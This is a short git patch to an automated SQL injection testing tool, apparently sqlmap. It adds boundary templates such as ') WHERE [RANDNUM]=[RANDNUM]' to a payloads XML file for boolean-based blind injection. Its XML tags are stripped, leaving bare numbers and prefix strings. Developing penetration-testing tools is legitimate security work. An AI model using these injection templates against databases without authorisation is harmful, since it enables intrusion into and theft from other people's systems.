From d283e3eb3c78e034c95a1d0e629204c9e964f24c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 24 Aug 2011 09:04:18 +0000 Subject: [PATCH] adding support for pre-WHERE injections --- xml/payloads.xml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index db1075f67..5f2b0c4d9 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -449,6 +449,45 @@ Formats: + + + 4 + 1 + 1,2 + 1 + ) WHERE [RANDNUM]=[RANDNUM] + + + + + 5 + 1 + 1,2 + 2 + ') WHERE [RANDNUM]=[RANDNUM] + + + + + 4 + 1 + 1,2 + 2 + ' WHERE [RANDNUM]=[RANDNUM] + + + + + 5 + 1 + 1,2 + 4 + " WHERE [RANDNUM]=[RANDNUM] + + + + + AND boolean-based blind - WHERE or HAVING clause